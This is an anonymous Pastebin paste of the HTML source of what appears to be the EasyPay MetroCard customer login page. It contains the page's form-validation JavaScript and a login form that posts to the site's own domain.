Advertisement
Guest User

Untitled

a guest
Apr 2nd, 2019
118
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
HTML 5 26.30 KB | None | 0 0
  1. <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
  2.    "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
  3. <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
  4.     <head>
  5.         <title>EasyPay</title>
  6.                 <meta http-equiv="Content-Type" content="text/html; charset=utf-8">
  7.                 <meta http-equiv="Pragma" content="no-cache">
  8.                 <meta http-equiv="X-Frame-Options" content="deny">
  9.                 <meta http-equiv="cache-control" content="no-cache">
  10.                 <meta http-equiv="cache-control" content="no-store">
  11.                 <meta name="viewport" content="width=device-width, initial-scale=1.0" />
  12.                 <meta http-equiv="X-UA-Compatible" content="IE=edge">
  13.                 <script type="text/javascript" src="../../common/js/index.js"></script>
  14.                 <script type="text/javascript" src="../../common/js/acs.js"></script>
  15.                 <script type="text/javascript" src="../../common/js/swfobject.js"></script>
  16.                 <script type="text/javascript" src="../../common/js/iepngfix_tilebg.js"></script>
  17.                 <link rel="stylesheet" type="text/css" href="../../common/css/index.css" />
  18.                 <link rel="stylesheet" type="text/css" href="../../common/css/custacs.css" />
  19.                
  20.                 <script LANGUAGE="JavaScript">
  21.                
  22.                     function IsBlank(iField) {
  23.        
  24.                         var tWhitespace = " \t\n\r";
  25.        
  26.                         tIsBlank = true;
  27.        
  28.                         if ((iField.value == null) || (iField.value.length == 0)) {
  29.                             tIsBlank = true;
  30.                         }
  31.                         else {
  32.                             var tCounter;
  33.                             for (tCounter = 0; (tCounter < iField.value.length)
  34.                                && (tIsBlank == true); tCounter++) {
  35.                                var tCurrentChar = iField.value.charAt(tCounter);
  36.                
  37.                                if (tWhitespace.indexOf(tCurrentChar) == -1) {
  38.                                    tIsBlank = false;
  39.                                }
  40.                            }
  41.                        }
  42.        
  43.                        return tIsBlank;
  44.        
  45.                    }
  46.                     function IsNumeric(iField) {
  47.                       var tIsDigit = false;
  48.                       var digits = "1234567890";
  49.  
  50.                         for (i = 0;  i < iField.value.length;  i++)
  51.                         {
  52.                            var IsDigit = false;
  53.                            var a = iField.value.charAt(i);
  54.                            for (j = 0;  j < digits.length;  j++)
  55.                            {
  56.                                 num = digits.charAt(j);
  57.                                 if (num == a)
  58.                                 {
  59.                                     IsDigit = true;
  60.                                 }
  61.                             }
  62.                             if (!(IsDigit))
  63.                             {
  64.                                 return false;
  65.                             }
  66.                         }
  67.                         return true;
  68.                     }
  69.                    function IsNonNumeric(iField) {
  70.        
  71.                        tIsNonNumeric = false;
  72.                        if ((iField.value == null) || (iField.value.length == 0)) {
  73.                            tIsNonNumeric = false;
  74.                        }
  75.                        else {
  76.                            var tCounter;
  77.                            for (tCounter = 0; (tCounter < iField.value.length)
  78.                                && (tIsNonNumeric == true); tCounter++) {
  79.                                var tCurrentCharCode = iField.value.charCodeAt(tCounter);
  80.                
  81.                                if ( (tCurrentCharCode < '0') || (tCurrentCharCode > '9') ){
  82.                                     tIsNonNumeric = false;
  83.                                 }
  84.                             }
  85.                         }
  86.        
  87.                         return tIsNonNumeric;
  88.                     }
  89.    
  90.                     function ContainSpecialCharacters(iField) {
  91.                         if ( IsBlank(iField) ) {
  92.                             return false;
  93.                         } else {
  94.                             if ((iField.value.indexOf('!',0) != -1 || iField.value.indexOf ('#',0) != -1) ||
  95.                                 (iField.value.indexOf('$',0) != -1 || iField.value.indexOf ('%',0) != -1) ||
  96.                                 (iField.value.indexOf('^',0) != -1 || iField.value.indexOf ('&',0) != -1) ||
  97.                                (iField.value.indexOf('*',0) != -1 || iField.value.indexOf ('(',0) != -1) ||
  98.                                (iField.value.indexOf(')',0) != -1 || iField.value.indexOf ('|',0) != -1) ||
  99.                                (iField.value.indexOf('?',0) != -1 || iField.value.indexOf ('=',0) != -1) ||
  100.                                (iField.value.indexOf('/',0) != -1 || iField.value.indexOf ('~',0) != -1) ||
  101.                                (iField.value.indexOf('"',0) != -1 || iField.value.indexOf ('|',0) != -1) ||
  102.                                (iField.value.indexOf(',',0) != -1 || iField.value.indexOf (':',0) != -1) ||
  103.                                (iField.value.indexOf(';',0) != -1 || iField.value.indexOf ('<',0) != -1) ||
  104.                                (iField.value.indexOf('`',0) != -1 || iField.value.indexOf ('\'',0) != -1) ||
  105.                                (iField.value.indexOf('\\',0) != -1 ) ||
  106.                                (iField.value.indexOf('+',0) != -1 || iField.value.indexOf ('>',0) != -1) ) {
  107.                
  108.                                 return true;
  109.                             }
  110.                         }
  111.                         return false;
  112.                     }
  113.    
  114.                     function ContainOtherSpecialCharacters(iField) {
  115.        
  116.                         if ( IsBlank(iField) ) {
  117.                             return false;
  118.                         } else {
  119.                             if ((iField.value.indexOf('-',0) != -1 || iField.value.indexOf ('_',0) != -1) ||
  120.                                 (iField.value.indexOf('@',0) != -1 || iField.value.indexOf ('.',0) != -1)) {
  121.                
  122.                                 return true;
  123.                             }
  124.                         }
  125.                         return false;
  126.                     }
  127.  
  128.                     function Mask(field){
  129.  
  130.                         var s3='*'.concat(field.value);
  131.                         var s2=field.value;
  132.                         var len=s3.length;
  133.                         var res = s3.replace(/\*/g, '');
  134.                         var i=1;
  135.  
  136.  
  137.                     for (i = len-1; i < len; i++) {
  138.    
  139.                         document.InputForm.iPassword.value= document.InputForm.iPassword.value + res;
  140.  
  141.  
  142.                         }
  143.                     var s1 = s2.replace(/./gi, '*');
  144.  
  145.                     document.InputForm.pin.value=s1;
  146.                     }
  147.  
  148.  
  149.    
  150.    
  151.    
  152.                    function ValidateEmail(iEmail) {
  153.                        if ( IsBlank(iEmail) ) {
  154.                            return true;
  155.                        } else {
  156.                            if (iEmail.value.indexOf('@',0) == -1 || iEmail.value.indexOf ('.',0) == -1) {
  157.                                alert("\nE-mail address requires a \"@\" and a \".\" be used. \n\nPlease re-enter your e-mail address.")
  158.                                iEmail.focus();
  159.                                return false;
  160.                            } else {
  161.                                if ( ContainSpecialCharacters(iEmail) ) {
  162.                                    alert("\nE-mail address contains an illegal character. \n\nPlease re-enter your e-mail address.")
  163.                                    iEmail.focus();
  164.                                    return false;
  165.                                }
  166.                            }
  167.                        }
  168.                        return true;
  169.                    }
  170.    
  171.                    function ValidateUserName(iField) {
  172.        
  173.                        if ( IsBlank(iField) ) {
  174.            
  175.                            return true;
  176.                        } else if ( ContainSpecialCharacters(iField) ) {
  177.            
  178.                            alert("\nUser Name contains  illegal character. \n\nPlease re-enter your User Name .")
  179.                            iField.focus();
  180.                            return false;
  181.                        }
  182.        
  183.                         else if (ContainOtherSpecialCharacters(iField)) {
  184.            
  185.                            alert("\nUser Name contains  illegal character. \n\nPlease re-enter your User Name.")
  186.                            iField.focus();
  187.                            return false;
  188.            
  189.                        }
  190.        
  191.                         else if (iField.value.length < 6)   {
  192.            
  193.                            alert("\n Invalid User Name . \n\nPlease try again.")
  194.                            iField.focus();
  195.                            return false;
  196.            
  197.                        }
  198.                        else
  199.                        {
  200.                           return true;
  201.                        }
  202.                    }
  203.    
  204.                    function IsInputValid(iForm)
  205.                    {
  206.                        var tIsInputValid = true;
  207.                        if ((IsBlank(iForm.iUserName) == true) && (IsBlank(iForm.iAccountNumber) == true))
  208.                        {
  209.                            alert("Please enter User Name or Account Number.");
  210.                            tIsInputValid = false;
  211.                        }
  212.                        else if (IsBlank(iForm.iUserName) == false && ! (ValidateUserName(iForm.iUserName)))
  213.                        {
  214.                             tIsInputValid = false;
  215.                        }
  216.                        else if (IsBlank(iForm.iUserName) == true && IsBlank(iForm.iAccountNumber) == true)
  217.                        {
  218.                            alert("Please enter User Name or Account Number.");
  219.                            tIsInputValid = false;
  220.                        }
  221.                        else if (IsNumeric(iForm.iAccountNumber) == false)
  222.                        {
  223.                            alert("Account Number must be numeric value.");
  224.                            tIsInputValid = false;
  225.                        }
  226.                        else if (IsBlank(iForm.iPassword) == true)
  227.                        {
  228.                            alert("Please enter Password.");
  229.                            tIsInputValid = false;
  230.                        }
  231.                        if (IsBlank(iForm.iPassword) == false)
  232.                        {
  233.                            if (iForm.iPassword.value.length < 10)
  234.                            {
  235.                                alert("\n Please enter valid Password.")
  236.                                 iForm.iPassword.value = "";
  237.                                 iForm.iPassword.focus();
  238.                                 document.InputForm.iPassword.value="";
  239.                                tIsInputValid = false;
  240.                            }
  241.                        }
  242.                        iForm.iDNSName.value = window.location.host.split(":")[0];
  243.                        return tIsInputValid;
  244.                    }
  245.  
  246.    
  247.                    function fnClear()
  248.                    {
  249.                        document.InputForm.iAccountNumber.value="";
  250.                        document.InputForm.iUserName.value="";
  251.                         document.InputForm.iPassword.value="";
  252.  
  253.                    }
  254.                </script>
  255.      </head>
  256. <body onLoad="fnClear();">
  257. <div id="WideHbarnew"> </div>
  258.  
  259. <section class="newcontent">
  260.     <div class="highlighted">
  261.         <h1 class="page-header">Existing Customers Log In</h1>
  262.     </div>
  263.        
  264.     <div id="container">
  265.             <div class="middle">
  266.              <table border="0" cellspacing="0" cellpadding="0">
  267.                  <tr>
  268.                     <td id="left">
  269.                      </td>
  270.                      <td class="centerContent" valign="top">
  271.                        <div class="contentIndex">
  272.                         <table border="0" cellspacing="0" cellpadding="0">
  273.                             <tr valign="top">
  274.                               <td>
  275.                                <form name="InputForm" autocomplete="off" action="https://www.easypaymetrocard.com/vector/forte/cgi_bin/forteisapi.dll" method="POST" onSubmit="return IsInputValid(this)">
  276.                                                 <input type="hidden" name="ServiceName" value="ETCAccountWebSO">
  277.                                                 <input type="hidden" name="TemplateName" value="accounts/AccountRegistration.html">
  278.                                                 <input type="hidden" name="iDNSName" value="www.easypaymetrocard.com">
  279.                                                 <input type="hidden" name="LoginType" value="T">
  280.  
  281.                                                 <div id="middleIndex">
  282.                                                 <div id="sideindex">
  283.                                                     <table >
  284.                                                         <tr><td>
  285.                                                                 <div class="subhead">Apply</div>
  286.                                                             </td>
  287.                                                         </tr>
  288.                                                         <tr>
  289.                                                             <td><div class="index"><a href="https://www.easypaymetrocard.com/vector/forte/cgi_bin/forteisapi.dll?ServiceName=ETCAccountWebSO&TemplateName=miscellaneous/PreFundedAccount.html">EasyPayXpress Application</a></div> </td>
  290.  
  291.                                                         </tr>
  292.                                                         <tr>
  293.                                                             <td><div class="index"><a href="https://www.easypaymetrocard.com/vector/static/forms/seniors.pdf" target="_blank">Senior Citizens (pdf)</a></div>
  294.                                                             </td>
  295.                                                         </tr>
  296.                                                         <tr>
  297.                                                             <td><div class="index"><a href="https://www.easypaymetrocard.com/vector/static/forms/disabled.pdf" target="_blank">People with Disabilities (pdf)</a></div>
  298.                                                             </td>
  299.                                                         </tr>
  300.  
  301.                                                         <tr><td>
  302.                                                                 <div class="subhead">Learn More</div>
  303.                                                             </td>
  304.                                                         </tr>
  305.                                                         <tr><td>
  306.                                                                 <div class="subhead">EasyPayXpress</div>
  307.                                                             </td>
  308.                                                         </tr>
  309.                                                         <tr>
  310.                                                             <td><div class="index"><a href="https://www.easypaymetrocard.com/vector/static/faq/XpressFaq.shtml">FAQs</a></div></td>
  311.                                                         </tr>
  312.  
  313.  
  314.  
  315.                                                         <tr><td>
  316.                                                                 <div class="subhead">Senior Citizens <br>& People with Disabilities</div>
  317.                                                            </td>
  318.                                                        </tr>
  319.                                                        <tr>
  320.                                                            <td><div class="index"><a href="https://www.easypaymetrocard.com/vector/static/faq/ReducedFaq.shtml">FAQs</a></div></td>
  321.                                                        </tr>
  322.                                                        <tr><td>
  323.                                                                <div class="subhead">Contact us</div>
  324.                                                            </td>
  325.                                                        </tr>
  326.                                                        <tr>
  327.                                                            <td ><div class="index"><a href="https://www.easypaymetrocard.com/vector/static/contactus/HowToReachUs.shtml">Phone</a></div> </td>
  328.  
  329.                                                        </tr>
  330.                                                        <tr>
  331.                                                            <td><div class="index"><a href="https://www.easypaymetrocard.com/vector/static/contactus/HowToReachUs.shtml">Mail</a></div></td>
  332.                                                        </tr>
  333.                                                        <tr>
  334.                                                            <td><div class="index"><a href="mailto:easypay@conduent.com">Email</a></div></td>
  335.                                                        </tr>
  336.  
  337.                                                         <tr><td>
  338.                                                                <div class="subhead">Phishing Policy</div>
  339.                                                            </td>
  340.                                                        </tr>
  341.                                                        <tr>
  342.                                                            <td><div class="index"><a href="https://www.easypaymetrocard.com/vector/static/faq/PhishingPolicy.shtml">Click Here</a></div></td>
  343.                                                        </tr>
  344.                                                         <tr><td>
  345.                                                                <div class="subhead">Terms & Conditions</div>
  346.                                                            </td>
  347.                                                        </tr>
  348.                                                         <tr>
  349.                                                            <td><div class="index"><a href="https://www.easypaymetrocard.com/vector/static/terms/TermsAndCondtions.shtml">Click Here</a></div></td>
  350.                                                        </tr>
  351.  
  352.                                                     </table>
  353.                                                </div>
  354.                                                  <div id="Vbarindex"></div>
  355.                                                  <div id="sideloginindex">
  356.                                                    <table width="675" border="0">
  357.                                                             <tr><td width="650"></td>
  358.                                                            </tr>
  359.                                                             <tr> <td><div class="subhead">LOGIN INFORMATION </div></br>
  360.                                                             <table border="0" cellspacing="0" cellpadding="0" id="">
  361.  
  362.                                                                    <tr>
  363.                                                                        <td>User Name:</td>
  364.                                                                        <td><input name="iUserName" type="text" class="text" id="username" size="20" /></td>
  365.                                                                    </tr>
  366.                                                                    <tr>
  367.                                                                        <td><b><small>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;OR</small></b></td>
  368.                                                                         <td></td>
  369.                                                                     </tr>
  370.                                                                     <tr>
  371.                                                                         <td nowrap>Account Number:</td>
  372.                                                                         <td><input name="iAccountNumber" type="text" class="text" id="iAccountNumber" size="20" /></td>
  373.                                                                     </tr>
  374.  
  375.                                                                     <tr><td></td><td>&nbsp;</td></tr>
  376.                                                                     <tr>
  377.                                                                         <td nowrap>Password:</td>
  378.                                                                        <td><input name="iPassword" type="password" class="text" id="iPassword" size="20" maxlength="15"/></td>
  379.  
  380.                                                                     </tr>
  381.                                                                  
  382.                                                                     <tr>
  383.                                                                         <td><b></b></td>
  384.                                                                          <td nowrap>&nbsp;&nbsp;
  385.                                                                             <span class="tiny" nowrap><a href="https://www.easypaymetrocard.com/vector/forte/cgi_bin/forteisapi.dll?ServiceName=ETCAccountWebSO&TemplateName=miscellaneous/firsttimeuser.html">First Time Password Setup?</a> &nbsp; <font color="red"><i><b>new</b></i></font></span><br />
  386.                                                                         </td>
  387.                                                                     </tr>
  388.                                                                     <tr>
  389.                                                                         <td><b></b></td>
  390.                                                                         <td>&nbsp;&nbsp;
  391.                                                                             <span class="tiny">  <a href="https://www.easypaymetrocard.com/vector/forte/cgi_bin/forteisapi.dll?ServiceName=ETCAccountWebSO&TemplateName=miscellaneous/UserNameAssistance.html">Forgot your User Name?</a></span><br />
  392.                                                                         </td>
  393.                                                                     </tr>
  394.                                                                    
  395.                                                                  <tr>
  396.                                                                         <td><b></b></td>
  397.                                                                          <td>&nbsp;&nbsp;
  398.                                                                             <span class="tiny"><a href="https://www.easypaymetrocard.com/vector/forte/cgi_bin/forteisapi.dll?ServiceName=ETCAccountWebSO&TemplateName=miscellaneous/ForgotPasswordAssistance.html">Forgot your PASSWORD?</a>&nbsp; <font color="red"><i><b>new</b></i></font></span><br />
  399.                                                                         </td>
  400.                                                                         </tr>
  401.                                                                         <tr>
  402.                                                                         <td><b></b></td>
  403.                                                                         <td>&nbsp;&nbsp;
  404.                                                                             <span class="tiny"><a href="https://www.easypaymetrocard.com/vector/forte/cgi_bin/forteisapi.dll?ServiceName=ETCAccountWebSO&TemplateName=miscellaneous/PasswordAssistance.html">Forgot your PIN?</a></span><br />
  405.                                                                         </td>
  406.                                                                         <tr>
  407.                                                                    
  408.                                                                        
  409.                                                                    
  410.                                                                    
  411.                                                                     <tr>
  412.                                                                         <td></td>
  413.                                                                         <td align="center">
  414.                                                                             <input type="image" src="../../common/images/acs/buttonSignin.png" alt="Submit" name="Signin" border="0"
  415.                                                                                   onMouseOver="swapImage('over','Signin');" onMouseOut="swapImage('out','Signin');" id="Signin">
  416.  
  417.                                                                         </td>
  418.                                                                     </tr>
  419.                                                                 </table>
  420.                                                                  <td >
  421.                                                                 <img style="margin-left:10px; position:static;" src="../../common/images/index/XPress.png" width="200" />
  422.                                                             </td>
  423.                                                             <td>
  424.                                                                 <img style="margin-left:5px; position:static;" src="../../common/images/index/RFcard.png" width="200" />
  425.                                                             </td>
  426.                                                             </td>
  427.                                                         </tr>
  428.                                                     </table>  
  429.                                                     <div class="subhead">All members must logout after account maintenance.</div></br>
  430.  
  431.                                             <div>    
  432.                                             <table border="0" cellspacing="0" cellpadding="0" id="" width="680" height="150" bordercolor="#6E6A6B">
  433.                                                 <tr>
  434.                                                     <td>
  435.                                                         <div id="" align="center">
  436.                                                         <font color="red"><br><b>IMPORTANT MESSAGE</b></font>
  437.                                                         </div>
  438.                                                         <font color="black" colspan="2">
  439.                                                             <p style="margin-left:10px;"><b>In an effort to increase security, we have taken extra steps to better protect your EasyPay account.  We recently updated the process to login to our website.  You will now be asked to authenticate your account using a password instead of a PIN.   If you have not already created a password, you must select the First Time Password Setup link on this page.  Rest assured, EasyPay is committed to safeguarding your personal information.</b></br></br><b>You can still use your PIN to access our Automated Telephone Service. </b></p></b>
  440.                                                         </font></td>
  441.                                                     </tr>
  442.                                             </table>
  443.                                          </div>
  444.                                             </br>              
  445.                                         <div>  
  446.                                         <table border="0" cellspacing="0" cellpadding="0" id="" width="680" height="80" bordercolor="#6E6A6B">
  447.                                         <tr><td>
  448.                                             <div id="" align="center"><font color="#000099"><b>Go Paperless and manage your account easily and securely!</b><br/></font>
  449.                                             <font color="black">
  450.                                             <b>To get started just login to your account and select Email Opt In to start receiving your statements and notices via email.
  451.                                             </b></font>
  452.                                             </div>
  453.                                             </td></tr>
  454.                                     </table>
  455.                                     </div>                 
  456.                                                             </td></tr></table></div>
  457.  
  458.                                 </form>
  459.                             </td>
  460.                             </tr>
  461.                         </table>
  462.                         </div>
  463.                         </br>
  464.                     </td>
  465.                     <td id="right"></td>
  466.                  </tr>          
  467.              </table>
  468.              </div>
  469.              <div class="bottom"></div>
  470.            </div>  
  471.            
  472.         <div class="footer" style="background-color:#000099; margin-top:0px;">
  473. </div>
  474.  
  475.  
  476.  
  477.      </div>                        
  478. </section>
  479. </body>
  480. </html>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement